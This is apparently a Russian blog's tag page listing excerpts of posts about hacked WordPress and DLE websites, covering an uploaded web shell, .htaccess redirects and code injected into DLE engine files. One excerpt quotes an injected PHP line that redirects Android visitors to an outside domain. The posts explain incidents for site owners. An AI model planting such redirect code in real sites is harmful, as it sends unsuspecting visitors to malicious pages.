Тег: шелл

Как ломают сайты на Вордпресс

Четверг, 20 Фев 2014 11:36 комментария 4

Всем привет! Как и обещал, сегодня логическое  продолжение истории про взлом  сайта на движке Вордпресс. В тот раз неизвестный хакер или хакеры взломали сайт под управлением CMS WordPress,  и залили на него шелл, благодаря чему был получен доступ ко всем остальным сайтам на сервере, и в файлах дополнительной конфигурации .htaccess была прописана переадресация на посторонние […]

Рубрика: Вордпресс (Wordpress), Хакинг (hacking) Теги: , , , ,

Как ломали сайты на DLE

Воскресенье, 10 Фев 2013 5:12 комментариев 45

Начало. Уязвимость в сайтах на движке Как видим, добавился не только новый домен http://yacounter.ws (ну любит злоумышленник зону ws, что тут поделать:)), но и eval. Но и за первую версию также есть случаи, которые говорят следующее. В файлах движка цмс  dle появляется совсем другой код, например, такой: if(stripos($_SERVER[‘HTTP_USER_AGENT’],»Android»)!==false) {header(‘Location: http://refresh-browser.00xff.net/’);exit;} Как видим, домен здесь совсем […]

Рубрика: Хакинг (hacking) Теги: , , , ,

Уязвимость в сайтах на движке dle

Суббота, 09 Фев 2013 23:08 комментариев 39

Как ломали сайты на  популярном новостном движке ДЛЕ, хронология событий. Совсем недавно я писал о том, что в начале месяца  было взломано огромное количество сайтов на dle, в результате чего на сайтах ничего не подозревающих владельцев,  естественно без их ведома,  прописывался вредоносный код. Сегодня поговорим более подробно про уязвимости в сайтах на движке dle, как […]

Рубрика: Хакинг (hacking) Теги: , , , ,